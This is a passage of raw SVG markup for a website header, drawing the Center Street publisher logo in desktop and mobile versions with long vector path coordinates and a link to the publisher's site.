0H6.2v0H6a4.51,4.51,0,0,1-2.75-.22H3.14v0l-.22-.08v0H2.84v0l-.15,0,0-.07L2.5,82l0-.08H2.39l0-.07-.11,0-.15-.19H2l-.26-.3L1.6,81.2v-.08L1.41,81v-.08l-.12-.07v-.08l-.07,0v-.08l-.08,0,0-.15L1,80.4l0-.15H1L.88,80h0v-.12h0v-.07h0l0-.19h0v-.11h0v-.12h0v-.15h0v-.15h0V79h0v-.19a4.89,4.89,0,0,1-.11-1.32v-.53h0v-.3h0V76.4h0v-.18h0v-.16h0v-.15h0V75.8h0v-.15h0l0-.23h0v-.07h0v-.12h0v-.11h0l0-.15H1v-.11H1l.08-.23h0l0-.15.08,0,.07-.22.08,0V74.1h0l0-.11.07,0v-.07l.08,0,0-.11.19-.16V73.5l.3-.27.08-.11h.08l.15-.19H2.5l.08-.11.11,0,0-.07H2.8l0-.08.15,0,0-.07h.08l.07-.08h.08v0h.07v0l1-.34c.16,0,.5,0,.6-.08"/><path class="cls-1" d="M20.46,74.55l0,.19h0V78a5.25,5.25,0,0,0,0,1.13c.07.23,0,.58,0,.79v.45h0v.31h0v.22h0v.15h0v.15h0l0,.15h0v.08l.07,0v.07l.08,0,.11.15h.08l0,.08h.08v0l.23.08v0l.75.15a1.59,1.59,0,0,1,0,.26.66.66,0,0,0-.12.12h-.37c-.12-.11-.35,0-.53-.08a5.3,5.3,0,0,0-1.59,0h-.3a1.57,1.57,0,0,1-.68.08.34.34,0,0,1-.07-.27l.11-.07v0l.42-.15,0-.08h.08l0-.07.15-.12v-.07l.07,0,0-.15h0v-.08h0v-.11A8.35,8.35,0,0,0,19.74,79c.1-1.06,0-2.28,0-3.4a5.75,5.75,0,0,0-.15-1.73l0-.27h0v-.07h0v-.08h0l-.07-.23-.12-.07v-.08l-.07,0-.12-.16H19l0-.07h-.08l0-.08h-.12v0h-.07v0h-.11v0h-.16v0c-.18,0-.24,0-.37-.07l-.08,0v-.19a.31.31,0,0,0,.08-.11c.3,0,.73,0,1.13,0h.41v0h.49v0a2.35,2.35,0,0,1,.72,0c.23.06.44.42.57.6l.07,0v0l.08,0v.07l.15.12v.07l.15.11v.08l.15.11v.08l.15.11v.08l.15.11v.08l.15.11v.07l.19.16v.07l.19.15v.08l.19.15v.07l.19.15V75l.19.15v.08l.19.15v.07l.18.15v.08l.19.15c.54.74,1.17,1.37,1.7,2.11l.19.15v.08l.19.15v.08l.22.18v.08l.23.19v.07l.38.31c.07,0,0,0,.07,0,.19-.13.05-.23.12-.45a4.46,4.46,0,0,0,0-.91l0-.94c0-1.38.12-3.09-.45-3.89l-.11-.08v0h-.08l-.07-.12h-.08v0l-.15,0v0l-.23,0v0h-.19v0h-.3v0l-.19,0a.76.76,0,0,1,0-.3,2.18,2.18,0,0,1,.64,0c.12.1.39,0,.57.08v0l1.21,0v0H28v0h.26v0h.3s0,0,.08,0v0l.15,0a.87.87,0,0,1,0,.3l-.08.08h-.07v0h-.15v0h-.12v0l-.15,0-.19.23-.07,0V73l-.08,0,0,.19a6.21,6.21,0,0,0-.18,2.15l-.12,4.34v2c0,.26.08.64,0,.76v0h-.19v0l-.12,0,0-.11L27,82.14v-.08l-.19-.15v-.07l-.23-.19v-.08l-.18-.15v-.07l-.19-.15v-.08L26,80.93v-.07l-.19-.15v-.08l-.19-.15V80.4l-.22-.19v-.07L25.18,80v-.08L25,79.76v-.07l-.23-.19v-.08l-.07,0a1,1,0,0,1-.08-.11h0V79.2l-.18-.15c-.45-.63-1-1.16-1.44-1.78l-.19-.15v-.07l-.22-.19v-.08l-.19-.15v-.08l-.19-.15v-.07l-.23-.19v-.08l-.19-.15v-.07l-.18-.15v-.08l-.23-.19v-.07l-.11-.08v0l-.08,0v-.08L21,75l0-.11-.3-.27v0h-.15m-7.39,1.93c.1,0,.2.08.3.11l.45,0a2.7,2.7,0,0,0,1.43-.18l.16-.19.07,0v-.08l.08,0V76l.07,0,0-.15h0v-.11h0v-.08h0c.08-.15,0-.24.23-.3v0h.15l0,.12h0v.3s0,0,0,0v.64l0,1h0v.94a1.37,1.37,0,0,1,0,.57l-.19,0L16,78.74h0v-.07h0v-.19l-.22-.68-.08,0v-.07l-.15-.12,0-.07h-.07v0s-.07,0-.12-.08a1.28,1.28,0,0,1-.37-.07H13.33v0l-.19,0-.15.31V78a7.15,7.15,0,0,0,0,1.55,4.43,4.43,0,0,0,0,1v.34h0l.07.45h0l.08.23.26.22a5.36,5.36,0,0,0,2.08-.19l.26,0v0h.08v0H16v0l.23-.07v0h.07v0l.15,0v0l.12,0,0-.08h.08l.07-.11h.08l.26-.3.12-.08v-.07l.11-.08v-.07l.08,0v-.08l.07,0v-.07h0v-.08h0c.08-.15,0-.19.22-.22a.57.57,0,0,0,.12.15,2.85,2.85,0,0,1-.46,1.62l0,.15-.12.08v.07l-.3.27-.07.11-.16,0,0,.07h-.08v0h-.11a3.44,3.44,0,0,1-1.36.19l-.6,0v0h-.34v0H13.9v0h-.42v0h-2v0l-1.13,0c-.09-.17-.12-.13-.08-.34a1.92,1.92,0,0,0,.76-.49l0-.19a5,5,0,0,0,.19-1.81V75.57a9.15,9.15,0,0,0-.11-2.45h0v-.07l-.07,0v-.08a1.7,1.7,0,0,0-.53-.3h-.11v0h-.16v0h-.18c-.25-.08-.3-.06-.31-.38a2.72,2.72,0,0,1,1-.08c.08.07.32,0,.46,0h1.24c.74.06,1.62,0,2.42,0h1a3.67,3.67,0,0,1,1.14,0c0,.06,0,.11,0,.19h0v.56h0v.46h0a4.3,4.3,0,0,1,0,1c-.12.07-.11.14-.3.15l0-.12c-.09-.1,0-.33,0-.49h0v-.18h0v-.12h0l0-.15h0v-.07l-.11-.08v-.08l-.11,0-.08-.12L16.08,73v0H16v0H15.9v0h-.12v0h-.19v0h-.22v0h-.53a4.17,4.17,0,0,0-1.66.08l-.19.26a3.15,3.15,0,0,0,0,1v2l.12.34M37.4,72.1a3,3,0,0,1,.68.08l0,.11h0v.08h0l0,.9a4.68,4.68,0,0,1,.12,1.17.45.45,0,0,0-.15.11c-.08,0,0,0-.08,0s-.09-.06-.15-.19h0v-.15h0V74h0l0-.23h0l0-.15h0v-.08l-.07,0v-.08l-.08,0v-.07l-.07-.08H37.4l-.07-.11h-.08a.3.3,0,0,0,0-.08l-.64-.19h-.45l-.94,0a1.16,1.16,0,0,1-.31.08c-.07.11,0,0-.11.07l-.15.27a2.16,2.16,0,0,0,0,.64V79.2A4.23,4.23,0,0,0,35,81.54l.08,0,.11.15h.07l0,.08a3.3,3.3,0,0,0,1.06.26.66.66,0,0,1,.07.34,2.87,2.87,0,0,1-1.09.08c-.07-.06-.25,0-.38,0l-.71,0-2,.12v0h-.38v0a.56.56,0,0,1-.3,0,1.05,1.05,0,0,1,0-.34.55.55,0,0,0,.11-.11l.5,0v0h.11v0l.15,0v0h.07l.08-.11.11,0v-.07l.12-.08a5.48,5.48,0,0,0,.22-2.41V75.35a13.42,13.42,0,0,0-.07-2.23l-.23-.19-.56,0v0h-.76v0H31v0h-.23v0l-.26,0v0h-.12v0h-.07v0h-.08l0,.07h-.08l0,.08-.11,0v.07l-.08,0,0,.19h0v.07h0l0,.27h0v.11h0l0,.26h0v.15h0v.16h0v.15l-.15.22h-.23a.44.44,0,0,0-.08-.07v-.08h0l0-.53h0v-.26h0V73.8h0v-.3h0v-.3h0v-.31h0c.08-.26-.06-.54.15-.67s.32,0,.53,0h1.81v0h3.66v0h.26l1.17,0c.16,0,.44,0,.53,0M45,75.27v.12h0a.43.43,0,0,1,0,.22v1.21h0v.6a6.45,6.45,0,0,1,0,1.4.57.57,0,0,1-.26,0c-.08-.18-.12-.46-.19-.64v-.12h0l0-.15h0l0-.15-.07,0v-.07c-.27-.38-1-.34-1.63-.34h-.64v0l-.19,0a2.34,2.34,0,0,0-.15.27v.26h0V79.8a4.1,4.1,0,0,0,.08,1.09v.19h0v.15h0v.08h0v.11l.08,0v.08l.07,0c.07.09,0,.07.12.12.18.2,1.13.11,1.39,0h.27l.94-.26v0l.15,0v0H45v0h.07l.08-.08h.07a.25.25,0,0,0,0-.07h.08l0-.08h.08l.11-.15h.08l.07-.11.23-.19v-.08l.11-.07V80.4l.08,0v-.08l.07,0,0-.15.08,0V80h0v-.08s0,0,.07-.07,0,0,.08,0,.08,0,.11.12h0l0,.6c-.06.22-.13.43-.19.64h0l-.07.23h0v.08h0l0,.15h0a.36.36,0,0,0,0,.11l-.08,0v.07l-.11.08-.23.26h-.07l0,.08h-.08v0l-.22.07v0l-.23,0v0h-.19a2.35,2.35,0,0,1-1.09,0h-.45v0H43v0h-.38a3.3,3.3,0,0,0-.87-.08H40.27v0h-.49a4.33,4.33,0,0,1-.72,0,.61.61,0,0,1,0-.3c.1,0,.19-.11.27-.15h.07v0l.15,0v0a.35.35,0,0,1,.15-.07,1,1,0,0,1,.16-.27V81.5h0v-.15h0V81.2h0V81h0l0-1.66v-5.1l0-.86h0v-.16h0v-.07h0v-.11l-.07,0v-.08l-.42-.26c-.19-.08-.79-.12-.87-.27v-.22a2.78,2.78,0,0,1,1-.08c.07.07.31,0,.45,0h1.21c.75,0,1.64,0,2.45,0h1v0h.83v0h.23a.51.51,0,0,1,.11.42c.09.09,0,.3,0,.45h0v.49h0a2.76,2.76,0,0,1,0,.87h0v.07l-.11.08v0h-.15l0-.12c-.08-.1,0-.3,0-.45a2.13,2.13,0,0,0-.22-.6l-.12-.08-.15-.19-.15,0v0l-.15,0v0l-.26,0v0l-.57-.08h-.34a4.17,4.17,0,0,0-1.66.08l-.19.26v.11h0v.91a14.23,14.23,0,0,0,.08,2.3.55.55,0,0,0,.34.11c.08.07.53,0,.72,0a2.28,2.28,0,0,0,1-.11l0-.07H44l.11-.15.07,0V76.1l.12-.07V76h0l.07-.23h0a.83.83,0,0,1,0-.15h0a1.16,1.16,0,0,0,0-.18l.11-.08,0-.08h.15c.05,0,0,0,.08,0M7.18,89.87l0-.15h0v-.19l-.23-.67h0l0-.16h0v-.07l-.08,0v-.07l-.08,0V88.4l-.07,0v-.07l-.11-.08v-.07L6.2,88l-.26-.3H5.86l-.08-.12-.11,0,0-.08-.15,0,0-.07H5.37v0H5.29v0H5.18v0H5.11v0H5v0l-.34,0v0a2,2,0,0,0-.87.08v0l-.22.07v0H3.48l0,.08H3.37l-.19.22-.11.08v.07l-.08,0v.08l-.07,0V88h0v.07h0a1.66,1.66,0,0,0-.07.68h0v.19h0V89h0l.07.23H3v.08l.12.07v.08l.49.34h.07l0,.07.15,0v0h.08v0l.22.08v0h.12v0h.07v0l.23.08v0h.11v0h.08v0h.07v0h.08v0H5v0l.23.07v0h.07v0h.08v0h.07v0h.08v0h.07v0h.08l.07.07h.08s0,0,0,.08l.15,0,0,.07h.07v0h.08l0,.07h.08l0,.08h.07l.12.15h.07l.12.15.34.3V92l.07,0v.07l.08,0,0,.15h0v.08h0l.07.22h0l.19.68v.3A2.39,2.39,0,0,1,7.6,94.7l-.12.49h0c0,.08-.05.15-.07.23h0v.08h0l0,.15-.08,0v.08l-.07,0v.07L7,96V96l-.38.34-.18.23H6.35l-.08.11H6.2l0,.08-.15,0v0H5.94v0L5.71,97v0H5.6v0H5.48v0H5.33v0H5.14v0a3.48,3.48,0,0,1-1.09-.08v0L3.6,97v0H3.48v0H3.37v0H3.26v0H3.14v0H3v0H2.92v0l-.23,0v0H2.54v0l-.3,0v0H2.16v0l-.11,0-.15-1h0v-.15h0v-.15h0V95h0v-.15h0v-.15h0v-.16h0v-.18h0v-.19c-.06-.18-.16-.56,0-.72s.1-.07.22-.08l0,.12h0v.11h0l0,.27H2V94h0v.11h0l0,.19h0s0,.1,0,.15h0v.11h0v.08h0v.08l.08,0,.07.23.08,0V95l.08,0v.08l.11.07v.08l.11.07v.08l.23.19c.11.12.22.25.34.37h.07l.08.12h.07l0,.07h.08l0,.08.16,0v0l.22.08v0h.12v0h.15v0h.22v0a.87.87,0,0,0,.38,0h.23v0l.22,0v0l.15,0v0h.08l0-.07h.07l.08-.12H6l0-.07L6.2,96v-.08l.15-.11v-.08l.08,0,0-.15h0v-.08h0l.07-.34h0v-.3h0v-.19h0v-.3h0v-.15h0V94h0l0-.15h0V93.8l-.07,0v-.08l-.15-.11-.15-.19H6l0-.07H5.9l0-.08H5.78l0-.07H5.67l-.07-.08H5.52v0H5.44v0H5.37v0H5.29v0l-.22-.08v0H5v0H4.88v0l-.15,0v0l-.15,0v0l-.15,0v0H4.35v0H4.28v0H4.2v0H4.12v0l-.6-.26,0-.08L3.26,92l0-.08H3.14l0-.07H3v0l-.11,0,0-.07H2.8l-.11-.15H2.62l-.31-.34L2.16,91V91l-.07,0v-.08l-.08,0v-.08H2v-.07h0v-.12h0v-.07h0l0-.23h0v-.19a3,3,0,0,1,.07-1.66l.08-.34H2l0-.15h0l0-.15.07,0v-.07l.08,0v-.08l.11-.07v-.08l.19-.15L2.73,87H2.8l.12-.16.15,0,0-.08h.07v0h.08v0h.11v0h.08v0h.11v0h.11v0h.19v0l.64,0v0h.38v0h.19v0h.15l1.24.53c.17,0,.46-.14.57-.19v0h.19a3.35,3.35,0,0,1,.07,1.25c.1.11,0,.39.08.57a2.87,2.87,0,0,1,.07,1.17c-.07,0-.06.06-.18.07s0,0-.08,0m1.92-.34a2.29,2.29,0,0,1,.08-.94l0-.64h0v-.3h0v-.3h0V87h0v-.19s0,0,0-.08l.11,0c.08-.07.34,0,.49,0l1.25,0h4.52v0h1a5.31,5.31,0,0,1,1.25,0v0h.07l.08.11c.14.14,0,.41.08.64h0v.38A3,3,0,0,1,18.35,89a.35.35,0,0,1-.23.07l-.07-.11h0v-.07h0l0-.31h0l-.08-.34h0v-.07l-.07,0V88l-.08,0v-.08l-.07,0-.15-.18h-.08l0-.08-.53-.19h-.22a3,3,0,0,0-.91,0v0l-.56,0a1.69,1.69,0,0,1-.27.11l0,.12-.07,0,0,.23h0v.34a6.84,6.84,0,0,0,0,1.51v3.09a6.84,6.84,0,0,0,0,1.51v.53h0v.26h0v.15h0v.16h0v.11h0v.11h0v.08h0v.07l.07,0V96l.12.07.15.19a2.91,2.91,0,0,0,1.09.3.48.48,0,0,1,.11.34.83.83,0,0,0-.15.11l-2.37-.11v0h-.61s0,0-.07,0H12.8v0h-.53a1.72,1.72,0,0,1-.75,0,1.05,1.05,0,0,1,0-.34s.06-.06.08-.07h.07v0l.49,0v0h.08v0h.11l0-.08h.08l0-.07h.08l.07-.08v-.08l.12-.07A5.72,5.72,0,0,0,13,93.61c0-2,.06-4,0-5.92-.12-.08,0,0-.08-.12l-.08,0v0l-.15,0v0h-.75c-.81,0-1.68.13-2,.64l-.34,1.13c-.06.17,0,.24-.15.34v0H9.18s0,0-.08,0m27.28.23a6.24,6.24,0,0,1,0,1.06v.34h0v.6c.06.21,0,.56,0,.79a1.94,1.94,0,0,1,0,.76.47.47,0,0,1-.19,0s0,0-.07,0l0-.15h0v-.23l-.19-.57h0l0-.11-.08,0v-.07h0L35.67,92a4.39,4.39,0,0,0-2.27-.18l-.19.22v.15a3.33,3.33,0,0,0-.07.87,10.15,10.15,0,0,0,.07,2.23v.22h0v.15h0v.12l.23.37h.07c.18.21,1.2.12,1.47,0h.23v0h.19v0h.15v0h.15v0h.11v0H36v0h.11v0h.08v0h.11v0l.15,0v0h.08l0-.08.15,0a.25.25,0,0,0,0-.07h.08l.07-.11H37l.15-.19.3-.27V95l.11-.08v-.07l.08,0a.83.83,0,0,1,0-.15l.19-.3c.07,0,0,0,.07,0s.09,0,.11.12,0,.51,0,.64-.17.53-.26.79h0V96h0l0,.15h0s0,.07,0,.11l-.07,0v.07l-.12.08,0,.11h0l-.08.12h-.07l-.08.11H37a.25.25,0,0,0,0,.07h-.08v0l-.15,0v0l-.22,0v0h-.16a3,3,0,0,1-1.28,0l-1.89-.15H31.86v0h-.57a3.48,3.48,0,0,1-.79,0l0-.19h0c.07-.24.27-.19.45-.3l0-.08h.07a2.11,2.11,0,0,0,.19-.23V96.1h0V96h0v-.11h0l0-.38a6.47,6.47,0,0,0,.08-1.62V88.59c0-.25,0-.5,0-.75h0l0-.23h0v-.08l-.08,0v-.08l-.34-.23h-.07v0c-.21-.09-.78-.09-.87-.27v-.22l.11,0c.08-.07.28,0,.42,0l1,0h.56v0h3.59l1.09,0c.24,0,.38-.09.49.07s0,.44.08.68h0v.46a3.78,3.78,0,0,1,0,.9h0a1.29,1.29,0,0,0,0,.19.58.58,0,0,1-.27.08l0-.12c-.09-.1,0-.33,0-.49h0v-.19h0V88.1h0l0-.15h0v-.08l-.15-.11-.11-.15a3.55,3.55,0,0,0-2-.34h-.86v0h-.23v0l-.15,0-.15.27v.15h0v2.26c0,.35,0,.87.23,1a1.79,1.79,0,0,0,.83.07v0h.34a1.39,1.39,0,0,0,.86-.15l.08-.11.22-.19v-.07l.08,0V90.4l.08-.07v-.08h0v-.07h0V90.1h0c.08-.18,0-.28.23-.34v0h.11s0,0,.07,0M46.27,89c0-.09,0-.08,0-.08v-.19h0v-.45h0v-.11h0v-.12h0a.83.83,0,0,0,0-.15l-.07,0V87.8l-.15-.11v0h-.08l0-.08-.11,0v0h-.11v0H45.4v0l-.68-.15h-.56c-.56,0-1.59-.13-1.7.3-.13.13-.11.63-.11.91V90.4h0l0,.49c.08,0,.08.09.19.12s.63.07.83,0h.87v0h.11v0h.08v0h.07a2.74,2.74,0,0,0,.76-1.17l.18,0v0c.18,0,.13.42.12.64s0,.6,0,.79l0,.91h0v1.17c-.09,0-.06.07-.22.07s-.07,0-.08-.07v-.08h0l0-.34h0V92.7h0v-.11h0v-.08h0V92.4l-.08,0,0-.15-.19-.15,0-.07h-.08l0-.08h-.11a4.15,4.15,0,0,0-1.32-.11h-.53v0l-.19,0a2.34,2.34,0,0,0-.15.27v.15h0v.56a7.16,7.16,0,0,0,0,1.85v.49h0v.27c.08.26.19.68.45.75s.91.08,1.14,0h.3l.94-.23v0h.08v0h.11v0l.23-.07v0h.07v0l.15,0,0-.07H46l0-.08h.08l.11-.15h.08l.19-.23.07,0v-.08l.15-.11v-.08l.08,0v-.07l.07,0v-.07h0v-.08l.08-.08v-.07s.14-.13.19-.11v0c.16.1.12.43.11.68-.08.09,0,.22-.08.34h0v.12h0v.11h0v.07h0v.12h0v.07h0l-.08.23-.07,0,0,.15-.12.07v.08l-.22.19-.08.11h-.07l0,.08a3.05,3.05,0,0,1-1.92.26h-.42v0h-.34v0h-.38v0h-.45v0h-.87L39.78,97a.47.47,0,0,1-.08-.3l.68-.37c0-.12.11-.18.15-.27l.16-.64,0-1.74V90.06a7.43,7.43,0,0,0-.15-2.37v-.12l-.07,0v-.07h0l-.11-.15h-.08l0-.08h-.07v0l-.23,0v0h-.11v0h-.15v0c-.19-.05-.31,0-.42-.11h0l0-.19h0c0-.09,0-.06.08-.11v0H40c.06.06.21,0,.34,0h.94a6,6,0,0,0,1.28,0h2.57l1,0,.22,0v0h.12v0c.15.13,0,.31.07.52h0v.42h0v.49a1.2,1.2,0,0,1,0,.68v.11l-.07,0a.3.3,0,0,0,0,.08h-.19m11.21,0-.23,0c0-.07-.12-.15-.15-.22L57,88.29h0l0-.15h0v-.08l-.07,0V88l-.12-.08V87.8l-.11,0-.08-.11h-.07v0l-.23-.08v0h-.11v0h-.15v0h-.27v0h-.45l-.83,0-.38.11-.11.16h0l0,.15h0l0,.64v5.09a5.84,5.84,0,0,0,.19,2v.11h0v.08h0a.83.83,0,0,1,0,.15l.08,0V96l.15.12a.25.25,0,0,0,0,.07h.07l0,.08.15,0v0h.08v0h.11v0h.11v0h.23v0c.24.07.2-.06.38.12l.07,0v.22a.83.83,0,0,0-.15.11L53,96.89v0h-.6s0,0-.08,0h-.41v0H51.4a1.73,1.73,0,0,1-.75,0,.64.64,0,0,1,0-.3s0,0,0-.07l.11,0v0h.3v0h.19v0h.11v0h.08v0h.07l0-.08h.08v0l.15-.12v-.07l.07,0V96l.08,0a7,7,0,0,0,.15-2.31V89.84A12.34,12.34,0,0,0,52,87.61l-.26-.19H51c-.87,0-1.7.15-2,.76v.11h0v.11h0v.12h0l0,.26h0l0,.3h0v.15h0c-.07.19,0,.19-.15.3v0h-.22c0-.07-.06-.06-.08-.15h0c0-.24.05-.48.08-.72h0v-.34h0V88a11.91,11.91,0,0,0,.19-1.24.69.69,0,0,0,.12-.11h1.43c.08.07.34,0,.49,0h4.34v0h1v0h.38l.71,0v0h.15l.19.22A13.28,13.28,0,0,1,57.48,89M25.67,90.14v.19h0v.11h0v.11h0l0,.19-.08,0v.07l-.07,0V91l-.19.15-.12.15a3.71,3.71,0,0,1-1.77.19c-.23,0-.56,0-.68-.08l-.11-.07c0-.84,0-1.82,0-2.72a3.59,3.59,0,0,1,.08-1.17l.07,0v-.07s.1,0,.15-.12a.71.71,0,0,0,.31-.07,2.23,2.23,0,0,1,2,.83l.16.11v.08l.07,0,.27.52a3.12,3.12,0,0,1,.11,1.44Zm2.87,5.92h-.19v0h-.08v0l-.15,0,0-.08H28l-.12-.15-.07,0v-.07l-.11-.08v-.07l-.08,0v-.08l-.07,0v-.08l-.08,0L27.4,95l-.07,0v-.08l-.08-.07V94.7h0v-.07h0v-.08h0l-.08-.22-.07,0v-.08l-.08-.07v-.08h0V94h0v-.08h0v-.07l-.07-.08v-.08l-.08,0,0-.15h0v-.08h0v-.08h0v-.07h0v-.08h0v-.07L26.35,93V93l-.08,0v-.08l-.07-.07V92.7h0v-.07h0v-.08h0v-.07L26,92.4v-.07l-.08,0v-.08l-.07-.07c-.06-.12-.06-.22-.15-.3v-.16l.3-.18h.07l0-.08h.08l0-.07h.08l.15-.19h.08l.07-.12h0V91l.15-.12,0-.11.07,0,0-.15h0v-.07h0l.07-.23h0v-.11h0V90h0v-.15h0v-.22h0v-.34a2.19,2.19,0,0,0-.15-.87v-.11h0L27,88.1h0V88h0l0-.15-.07,0v-.08l-.15-.11v-.08l-.08,0c-.06-.07-.12-.15-.19-.22h-.07l-.12-.15-.11,0,0-.08-.15,0,0-.08h-.07v0l-.15,0v0l-.19,0v0l-.23,0v0l-.3,0v0l-1.13,0-.94,0v0h-.42c-.07,0-.07,0-.07,0h-.57v0H20a1.73,1.73,0,0,0-.75,0c0,.07,0,0,0,.07,0,.53.44.34.79.49v0h.08v0l.22.07.08.12h.07l.27.37,0,.31a9.68,9.68,0,0,1,.07,2.18v4.12a4.41,4.41,0,0,1-.15,1.73l-.08,0-.15.19h-.07l0,.07h-.07v0h-.08v0h-.11a1.82,1.82,0,0,0-.23.15.53.53,0,0,0,.08.34,2.73,2.73,0,0,0,.64,0v0h.37v0h.42c.21,0,.53,0,.79,0,.06,0,.13-.07.23,0v0c.24.06.83-.09,1,0h.53a1.11,1.11,0,0,1,.11-.11c0-.32-.1-.3-.34-.38H23.4v0h-.11v0h-.11v0H23.1l-.3-.23V96.1l-.07,0V96h0l0-.15h0v-.16h0v-.15h0v-.22h0c0-.13,0-.26,0-.34V93.08a3.28,3.28,0,0,1,0-.9l.34-.12h.53v0h.34v0l.22,0v0H24l.15.19.07,0v.07l.08,0,0,.12h0v.07l.07.08v.07h0V93h0V93h0v.08h0v.07h0v.08h0l.07.23h0l.11.34h0v.07h0V94h0v.07h0v.08h0l0,.15h0l0,.15h0l.08.23h0v.07h0v.08h0v.07l.08.08V95l.07,0v.08l.08.07v.08h0v.07l.07,0v.08h0v.07l.07,0,0,.15h0l0,.11.07,0V96l.08,0v.08l.15.11v.08l.3.26.12.15h.07l0,.08.15,0v0l.15,0v0a1.81,1.81,0,0,0,.79.07v0h.19l.79-.34a.3.3,0,0,0,0-.08H29v0l.22-.18a.53.53,0,0,0-.07-.31,1.4,1.4,0,0,1-.64,0ZM53.4,75.88h0l0,.22h0a.83.83,0,0,0,0,.15h0v.08l-.07,0v.07l-.15.11a1.26,1.26,0,0,1-.42.34h-.11a3.89,3.89,0,0,1-1.21.08H50.5a1.31,1.31,0,0,1-.27-.19c0-.79,0-1.72,0-2.56a4.25,4.25,0,0,1,0-1.14h0l0-.19h0l.16-.18.26,0v0a2.49,2.49,0,0,1,1.36.26l.15,0,0,.08h.07l.08.11h.07l.27.3.11.08v.07l.08,0v.08l.07,0v.07l.08,0v.07h0l0,.15h0c.06.23.13.46.19.68a3.68,3.68,0,0,1,0,1ZM57,81.57h0v0a2.17,2.17,0,0,1-1,0v0h-.07l-.42-.38V81L55.4,81v-.08l-.08,0,0-.15-.08,0a.83.83,0,0,0,0-.15l-.07,0V80.4L55,80.33v-.08h0v-.07h0V80.1L54.87,80V80l-.07,0-.08-.22h0v-.08h0v-.07h0v-.08h0v-.08l-.08-.07v-.08l-.07,0v-.08l-.08-.07V79h0v-.08h0v-.07h0l-.07-.23-.08,0v-.07L54,78.4v-.07h0v-.08h0v-.07h0V78.1L53.82,78V78l-.08,0v-.07l-.08-.08v-.07h0l-.08-.23-.07,0v-.11h0c0-.22.07-.15.22-.23v0h.08v0h.08v0l.11,0a.25.25,0,0,1,0-.07H54l.12-.15h.07l.11-.16.08,0v-.08l.15-.11v-.08l.08,0,0-.12h0l.11-.34h0v-.07h0v-.12h0v-.15h0v-.19a2.38,2.38,0,0,0-.12-1.32V73.8h0l0-.15h0l-.08-.23h0a.36.36,0,0,1,0-.11l-.08,0V73.2l-.19-.15-.3-.34H54l-.08-.12h-.07l0-.07-.15,0v0h-.08l0-.07H53.4v0l-.15,0v0l-.23,0v0h-.15v0h-.15v0H52.5v0H52v0l-.22,0a5.2,5.2,0,0,0-.72,0h-.53v0H50v0H49.4a5.58,5.58,0,0,1-1.58,0c-.15,0-.33,0-.42,0s-.39,0-.45.08v.07h0v.15h0c.08.25.44.17.68.27v0h.11v0l.23.08,0,.07h.07l.15.19.08,0v.07l.07,0v.08h0v.11a6.4,6.4,0,0,1,.11,1.85v4.15a8.47,8.47,0,0,1-.07,2.11h0l0,.15-.07,0-.15.19h-.08A.3.3,0,0,1,48,82l-.15,0v0l-.22,0v0l-.12.07a1.14,1.14,0,0,0,0,.3,2.5,2.5,0,0,0,1,0H49v0h.52a3.57,3.57,0,0,1,1,0v0c.19,0,.54-.08.67,0h.42a1,1,0,0,1,.11-.12v-.22l-.07,0c-.17-.15-.23,0-.46-.11v0H51v0l-.22-.08v0h-.08c-.61-.42-.53-1.93-.53-3a4.27,4.27,0,0,1,0-1.1s0-.07,0-.11a2.45,2.45,0,0,1,1.32,0h.11a.25.25,0,0,1,0,.07h.08l.07.12h0V78L52,78s0,.1,0,.15l.08,0v.08l.07.08v.07h0v.08h0v.07h0v.08h0v.07h0l.08.23h0v.11l1.06,2h0l0,.11.08,0,0,.15.11.08v.07l.08,0v.08l.19.15v.07l.07,0,.11.15h.08l.11.15h.08a.3.3,0,0,0,0,.08h.07v0h.08v0h.11a1.22,1.22,0,0,0,.72.12v0h.19v0l.26,0v0h.07v0h.12v0l.22-.08v0l.16,0,0-.08h.08v0a.22.22,0,0,1,.15-.08c0-.1.05-.09.08-.19h0l0-.19"/><path class="cls-1" d="M63,94.44a.42.42,0,0,0-.2-.41,1.39,1.39,0,0,0-.63-.11h-.44v1h.47a1.5,1.5,0,0,0,.49-.06.42.42,0,0,0,.31-.43Zm-.76-.85a2.31,2.31,0,0,1,.81.1.69.69,0,0,1,.46.7.62.62,0,0,1-.29.56,1.29,1.29,0,0,1-.43.13.79.79,0,0,1,.51.27.75.75,0,0,1,.16.44V96a1.48,1.48,0,0,0,0,.21.37.37,0,0,0,0,.14l0,0H63V96a.68.68,0,0,0-.28-.64,1.34,1.34,0,0,0-.58-.09h-.41v1.1h-.52V93.59Zm0-.79a2.3,2.3,0,0,0-1.64.64,2.14,2.14,0,0,0,0,3.11,2.39,2.39,0,0,0,3.28,0,2.12,2.12,0,0,0,0-3.11A2.29,2.29,0,0,0,62.3,92.8ZM65,95a2.37,2.37,0,0,1-.79,1.8,2.79,2.79,0,0,1-3.81,0,2.35,2.35,0,0,1-.79-1.8,2.38,2.38,0,0,1,.79-1.79,2.79,2.79,0,0,1,3.81,0A2.35,2.35,0,0,1,65,95"/></svg>
	</a>
	<a class="site-header__branding--imprint-header-logo__mobile" href="https://www.centerstreet.com/">
		<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 70 98.1"><defs><style>.centerstreetmobile-cls-1{fill:#FFFFFF;}</style></defs><title>center st</title><path class="centerstreetmobile-cls-1" d="M38.91,44.41h0l-.79.15h-.53a2.1,2.1,0,0,1-.79,0H35.48l-.87-.23a1.63,1.63,0,0,0,.19.34v.15h.07v.08L35,45v.08h0v0h0v.08H35v.07l.07.08v.07h0v.08h.08v.08l.07.08v.07h0v.08h.08v.08l.07.08V46h0v.08h.07l.08.23h.08v.07l.07.08v.07h0v.08h.07a2,2,0,0,1,.08.22h.08l.07.23h.08l.07.22h.08v.15h.07v.07h0v.08h0v.11h.08a3.14,3.14,0,0,1,.26-1v-.22h0v-.16h0V46.2h0a.28.28,0,0,1,.08-.23h0v-.15h.08v-.15h.07v-.15h.07v-.08H37v-.12l.11-.07v-.08l.11-.07v.1l.27-.23a3.53,3.53,0,0,1,.6-.56Zm-3-1.51h.52a2.32,2.32,0,0,0,.83,0H39l.33-.07h.19l.23-.08h.15v-.08H40v-.08h.08l.11-.15h.08l.15-.12v-.07l.15-.12v-.07h.07V42h0v-.16h0a1.84,1.84,0,0,0-.08-1.47l-.15-.11-.15-.19L40,40h-.11a1.19,1.19,0,0,0-.53,0H39.2v.07h-.07l-.08.08v.07H39v.15h0V40h0v.18h0v.68h0a.61.61,0,0,1,0,.19h-.07v.08l-.08.07h-.07v.08a1.52,1.52,0,0,1-.76.11.73.73,0,0,0-.3-.19c0-.14-.11-.25-.15-.38a2.48,2.48,0,0,1,.08-.9v-.3a2.87,2.87,0,0,